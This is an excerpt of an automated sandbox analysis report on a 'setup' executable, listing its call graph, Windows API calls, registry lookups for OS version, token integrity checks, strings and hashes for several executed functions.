API calls 3 library calls 32488->32536 32489 c88a81 32517 bc2290 32489->32517 32492 c88cfa 32492->32467 32495 bc2290 42 API calls 32496 c88ae9 32495->32496 32496->32497 32498 c88aff LoadLibraryExW 32496->32498 32530 d7fd55 5 API calls ___raise_securityfailure 32497->32530 32498->32497 32499->32471 32500->32460 32501->32470 32503 baad28 32502->32503 32515 baad7c 32502->32515 32504 d80260 4 API calls 32503->32504 32506 baad32 32504->32506 32505 d80260 4 API calls 32507 baad96 32505->32507 32508 baad3e GetProcessHeap 32506->32508 32506->32515 32516 baae07 32507->32516 32539 d80118 43 API calls 32507->32539 32537 d80118 43 API calls 32508->32537 32511 baad6b 32538 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32511->32538 32512 baadf6 32540 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32512->32540 32515->32505 32515->32516 32516->32480 32516->32481 32520 bc22b6 32517->32520 32523 bc2321 std::_Locinfo::_Locinfo_ctor 32517->32523 32518 baa9b0 2 API calls 32519 bc236c 32518->32519 32520->32523 32526 bc2300 std::locale::_Setgloballocale 32520->32526 32541 baa7c0 42 API calls 32520->32541 32522 bc234f 32522->32495 32523->32518 32523->32522 32525 bc233d 32543 d851df 40 API calls __cftof 32525->32543 32526->32523 32542 d852ff 13 API calls __dosmaperr 32526->32542 32528->32489 32529->32489 32530->32478 32532 baa9bd 32531->32532 32544 d81aea 32532->32544 32534 baa9ca RtlAllocateHeap 32534->32483 32535->32488 32536->32492 32537->32511 32538->32515 32539->32512 32540->32516 32541->32526 32542->32525 32543->32523 32545 d81b31 RaiseException 32544->32545 32546 d81b04 32544->32546 32545->32534 32546->32545 32547 baabc0 32548 baabcc 32547->32548 32549 baac04 32547->32549 32548->32549 32550 baa9b0 2 API calls 32548->32550 32550->32549 32551 cb08f0 32552 cb0967 32551->32552 32553 cb0927 32551->32553 32554 d80260 4 API calls 32553->32554 32555 cb0931 32554->32555 32555->32552 32559 d80118 43 API calls 32555->32559 32557 cb0953 32560 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32557->32560 32559->32557 32560->32552 32561 d97f27 GetLastError 32562 d97f3d 32561->32562 32563 d97f43 32561->32563 32596 d99c6f 6 API calls std::_Lockit::_Lockit 32562->32596 32567 d97f47 SetLastError 32563->32567 32584 d99cae 32563->32584 32571 d97f8d 32574 d99cae __Getcoll 6 API calls 32571->32574 32572 d97f7c 32573 d99cae __Getcoll 6 API calls 32572->32573 32581 d97f8a 32573->32581 32575 d97f99 32574->32575 32576 d97f9d 32575->32576 32577 d97fb4 32575->32577 32578 d99cae __Getcoll 6 API calls 32576->32578 32598 d97c04 13 API calls __Getcoll 32577->32598 32578->32581 32597 d9817e 13 API calls __dosmaperr 32581->32597 32582 d97fbf 32599 d9817e 13 API calls __dosmaperr 32582->32599 32600 d99a1e 32584->32600 32587 d99ce8 TlsSetValue 32588 d97f5f 32588->32567 32589 d99720 32588->32589 32595 d9972d __Getcoll 32589->32595 32590 d9976d 32609 d852ff 13 API calls __dosmaperr 32590->32609 32591 d99758 RtlAllocateHeap 32593 d97f74 32591->32593 32591->32595 32593->32571 32593->32572 32595->32590 32595->32591 32608 d95443 EnterCriticalSection std::_Facet_Register 32595->32608 32596->32563 32597->32567 32598->32582 32599->32567 32601 d99a48 32600->32601 32602 d99a4c 32600->32602 32601->32587 32601->32588 32602->32601 32607 d99953 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 32602->32607 32604 d99a60 32604->32601 32605 d99a66 GetProcAddress 32604->32605 32605->32601 32606 d99a76 std::_Lockit::_Lockit 32605->32606 32606->32601 32607->32604 32608->32595 32609->32593

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 00C889F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228libraryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 209 c889f0-c88a39 GetSystemDirectoryW 210 c88b2f 209->210 211 c88a3f-c88a44 209->211 212 c88b31-c88b52 call d7fd55 210->212 211->210 213 c88a4a-c88a53 call baacf0 211->213 218 c88a59-c88a73 213->218 219 c88b53-c88d79 call baa9b0 call d7fd94 call bbf0f0 213->219 223 c88a83-c88a89 218->223 224 c88a75-c88a81 call baa2a0 218->224 226 c88a90-c88a99 223->226 233 c88aac-c88ac4 call bc2290 224->233 226->226 229 c88a9b-c88aa7 call baa830 226->229 229->233 238 c88aca-c88acf 233->238 239 c88ac6-c88ac8 233->239 241 c88ad0-c88ad9 238->241 240 c88adf-c88af9 call bc2290 call d81548 239->240 247 c88afb-c88afd 240->247 248 c88aff-c88b0a LoadLibraryExW 240->248 241->241 242 c88adb-c88add 241->242 242->240 249 c88b0c-c88b21 247->249 248->249 250 c88b2b-c88b2d 249->250 251 c88b23-c88b26 249->251 250->212 251->250
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,00BA124B,http://,?,80004005,E5106CA8,?,00DAA90F,000000FF), ref: 00BAA2C3
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,00DE0ACD,000000FF), ref: 00C88B04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                                                                              • String ID: UxTheme.dll
                                                                                                                                                                              • API String ID: 2586271605-352951104
                                                                                                                                                                              • Opcode ID: 75dce3cf6faa80780781cca4fe433c20a42382b1d87c08022deaef6910d67a01
                                                                                                                                                                              • Instruction ID: 068ecc62520be13866f13f6d31759f70d04cf19ebb339b4ecf7998f04be1444a
                                                                                                                                                                              • Opcode Fuzzy Hash: 75dce3cf6faa80780781cca4fe433c20a42382b1d87c08022deaef6910d67a01
                                                                                                                                                                              • Instruction Fuzzy Hash: ECA18BB0501645EFE714DF64C858BAABBF4FF04318F20825DD4299B6C1DBB6A618CB90
                                                                                                                                                                              Function 00CD1470 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 cd1470-cd14e8 RegOpenKeyExW 2 cd14ee-cd151f RegQueryValueExW 0->2 3 cd1752-cd176b 0->3 4 cd156f-cd159a RegQueryValueExW 2->4 5 cd1521-cd1533 call cd6ec0 2->5 6 cd176d-cd1774 RegCloseKey 3->6 7 cd177e-cd1799 call d7fd55 3->7 4->3 10 cd15a0-cd15b1 4->10 15 cd1535-cd1542 5->15 16 cd1544-cd155b call cd6ec0 5->16 6->7 13 cd15bd-cd15bf 10->13 14 cd15b3-cd15bb 10->14 13->3 17 cd15c5-cd15cc 13->17 14->13 14->14 18 cd156a 15->18 24 cd155d 16->24 25 cd1562-cd1568 16->25 20 cd15d0-cd15de call cd6ec0 17->20 18->4 26 cd15e9-cd15f7 call cd6ec0 20->26 27 cd15e0-cd15e4 20->27 24->25 25->18 32 cd15f9-cd15fd 26->32 33 cd1602-cd1610 call cd6ec0 26->33 28 cd1724 27->28 31 cd172b-cd1738 28->31 34 cd174a-cd174c 31->34 35 cd173a 31->35 32->28 39 cd161b-cd1629 call cd6ec0 33->39 40 cd1612-cd1616 33->40 34->3 34->20 37 cd1740-cd1748 35->37 37->34 37->37 43 cd162b-cd162f 39->43 44 cd1634-cd1642 call cd6ec0 39->44 40->28 43->28 47 cd164d-cd165b call cd6ec0 44->47 48 cd1644-cd1648 44->48 51 cd165d-cd1661 47->51 52 cd1666-cd1674 call cd6ec0 47->52 48->28 51->28 55 cd167f-cd168d call cd6ec0 52->55 56 cd1676-cd167a 52->56 59 cd168f-cd1694 55->59 60 cd1699-cd16a7 call cd6ec0 55->60 56->28 62 cd1721 59->62 64 cd16a9-cd16ae 60->64 65 cd16b0-cd16be call cd6ec0 60->65 62->28 64->62 68 cd16c7-cd16d5 call cd6ec0 65->68 69 cd16c0-cd16c5 65->69 72 cd16de-cd16ec call cd6ec0 68->72 73 cd16d7-cd16dc 68->73 69->62 76 cd16ee-cd16f3 72->76 77 cd16f5-cd1703 call cd6ec0 72->77 73->62 76->62 80 cd170c-cd171a call cd6ec0 77->80 81 cd1705-cd170a 77->81 80->31 84 cd171c 80->84 81->62 84->62
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00CD14E0
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 00CD151B
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00CD1596
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD176E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                                                                                                                              • API String ID: 1586453840-3149529848
                                                                                                                                                                              • Opcode ID: 0f872ced4df98a3476f591b08add6f1e60eca958a7668d7d1ec2bc0a9eb38c07
                                                                                                                                                                              • Instruction ID: 7ca58ea169e09e871f0192fe11255ace1b7727abbf5ed2509e743566d20c8e79
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f872ced4df98a3476f591b08add6f1e60eca958a7668d7d1ec2bc0a9eb38c07
                                                                                                                                                                              • Instruction Fuzzy Hash: EF71A478700318AADB209B31ED417AA73B5EB85744F19507BEF16A7791EB34CE4A8780
                                                                                                                                                                              Function 00CD10E0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 224registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 85 cd10e0-cd1156 RegOpenKeyExW 87 cd115c-cd11bd RegQueryValueExW * 2 85->87 88 cd141b-cd1434 85->88 91 cd11bf-cd11f1 RegQueryValueExW 87->91 92 cd121b-cd125c RegQueryValueExW 87->92 89 cd1447-cd1460 call d7fd55 88->89 90 cd1436-cd143d RegCloseKey 88->90 90->89 91->92 93 cd11f3-cd11fb 91->93 94 cd125e-cd1286 call cd6e20 92->94 95 cd1288 92->95 93->93 97 cd11fd-cd1200 93->97 99 cd128e-cd1296 94->99 95->99 97->92 101 cd1202-cd1215 97->101 103 cd1298-cd12a6 99->103 104 cd12ab-cd12d6 RegQueryValueExW 99->104 101->92 103->104 105 cd12fd-cd1328 RegQueryValueExW 104->105 106 cd12d8-cd12f8 call cd6e20 104->106 108 cd137f-cd1392 105->108 109 cd132a-cd1339 105->109 106->105 112 cd13db-cd13e3 108->112 113 cd1394-cd13a8 call d80260 108->113 110 cd133b-cd1344 109->110 111 cd1355-cd1363 109->111 115 cd1346-cd1353 110->115 116 cd136f-cd137a 111->116 117 cd1365-cd136d 111->117 119 cd140f 112->119 120 cd13e5-cd1401 GetCurrentProcess 112->120 113->112 124 cd13aa-cd13d8 GetModuleHandleW GetProcAddress call d80216 113->124 115->111 115->115 116->108 117->116 117->117 121 cd1411-cd1416 call cd1470 119->121 120->119 126 cd1403-cd140d 120->126 121->88 124->112 126->121
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00CD12D2
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00CD1324
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CD13B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD13BF
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD13D3
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00CD13F6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD1437
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcProcess
                                                                                                                                                                              • String ID: $CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                                                                                              • API String ID: 1850716914-483456580
                                                                                                                                                                              • Opcode ID: d9b643a4050dd598a880775d5eacf5eff166cc8de8c70d74e43425d0f61bf4a7
                                                                                                                                                                              • Instruction ID: c2669d488fa3aa0ae58072d52efb8afb448600c58d8726c738fadc3ff40ea3fd
                                                                                                                                                                              • Opcode Fuzzy Hash: d9b643a4050dd598a880775d5eacf5eff166cc8de8c70d74e43425d0f61bf4a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 9791A1B1900328AEDB20CF21CC45B9AB7B5FB45710F0442A6E919B7290DB76AE98CF50
                                                                                                                                                                              Function 00CC72E0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CC7328
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CC7335
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC733F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00DEB0F5), ref: 00CC7369
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC736F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00DEB0F5,00DEB0F5,00DEB0F5), ref: 00CC7395
                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC73C8
                                                                                                                                                                              • EqualSid.ADVAPI32(00000000,?), ref: 00CC73D7
                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00CC73E6
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC7420
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 695978879-1452845052
                                                                                                                                                                              • Opcode ID: 3d5ead653e4942378a281e479019ddc8960345fc1065d176c0ab9909961cbef4
                                                                                                                                                                              • Instruction ID: 393da95fbd2d205c17e21a474556ed87da4b6c147708231fef71f5c843a5f97d
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d5ead653e4942378a281e479019ddc8960345fc1065d176c0ab9909961cbef4
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F410A71904209DFDF10DFA5CC49BEEBBB8EF08714F14421AE921B21A0D7799A48DF64
                                                                                                                                                                              Function 00BB180E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 159libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 150 bb180e-bb1822 call d80260 153 bb1849-bb1850 150->153 154 bb1824-bb1846 call d80118 call d80216 150->154 155 bb1a87-bb1ac3 call ba7830 call d7fd55 153->155 156 bb1856 call cc72e0 153->156 154->153 162 bb185b-bb186e 156->162 168 bb18ba-bb18c1 162->168 169 bb1870-bb1884 call d80260 162->169 171 bb18c3-bb18d3 168->171 172 bb18d5-bb18ff GetWindowsDirectoryW call d89c73 168->172 169->168 176 bb1886-bb18b7 GetModuleHandleW GetProcAddress call d80216 169->176 178 bb1902-bb1911 171->178 172->178 176->168 182 bb19bf-bb19c1 178->182 183 bb1917-bb1964 call cc74e0 call cc76d0 * 2 call cc7c40 178->183 182->155 184 bb19c7-bb19ee 182->184 203 bb199a-bb19a9 call cc7580 183->203 204 bb1966-bb1994 CreateDirectoryW 183->204 186 bb19f0-bb19f9 184->186 186->186 188 bb19fb-bb1a37 call ba8300 call cbd440 186->188 198 bb1a6a-bb1a80 188->198 199 bb1a39-bb1a4e 188->199 198->155 201 bb1a60-bb1a67 call d7fd63 199->201 202 bb1a50-bb1a5e 199->202 201->198 202->201 203->182 204->203
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00BB1897
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BB189E
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB1841
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB18B2
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00BB18E1
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?), ref: 00BB1994
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$DirectoryEnterInit_thread_footerLeave$AddressConditionCreateHandleModuleProcVariableWakeWindows
                                                                                                                                                                              • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                                                                                                                              • API String ID: 1425133133-595641723
                                                                                                                                                                              • Opcode ID: 4299ff60e0f5dccc597fdae5ddfc151e671897c675695c7e9a815bca9a7f7c32
                                                                                                                                                                              • Instruction ID: 059c09444a7f0d57b8a9f883e765a81b0239ec26718c2e68cc8854a53a3863a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 4299ff60e0f5dccc597fdae5ddfc151e671897c675695c7e9a815bca9a7f7c32
                                                                                                                                                                              • Instruction Fuzzy Hash: C351C471900318ABDB20EBA4DC9ABEE73B4EB45304F5442D9E406B7191EBB46B88CF51
                                                                                                                                                                              Function 00CB08F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 252 cb08f0-cb0925 253 cb096a-cb0988 252->253 254 cb0927-cb093b call d80260 252->254 254->253 257 cb093d-cb0944 call cb0a00 254->257 259 cb0949-cb0967 call d80118 call d80216 257->259 259->253
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CB0962
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                              • String ID: h
                                                                                                                                                                              • API String ID: 2296764815-3790492082
                                                                                                                                                                              • Opcode ID: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction ID: 8ea8216e7fc8e76fe41194ddebfe873f97289ae1f71ca568da1c1879b515122a
                                                                                                                                                                              • Opcode Fuzzy Hash: de4bfeb1e3e74266bca5d8b278f43247fee322f9fbc69d0e923a72c52baedafd
                                                                                                                                                                              • Instruction Fuzzy Hash: 2301D4B1E04648DFC758EB59EC42B49B3A8E70EB20F24427AE426E33D0D735F9049A21
                                                                                                                                                                              Function 00D97F27 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
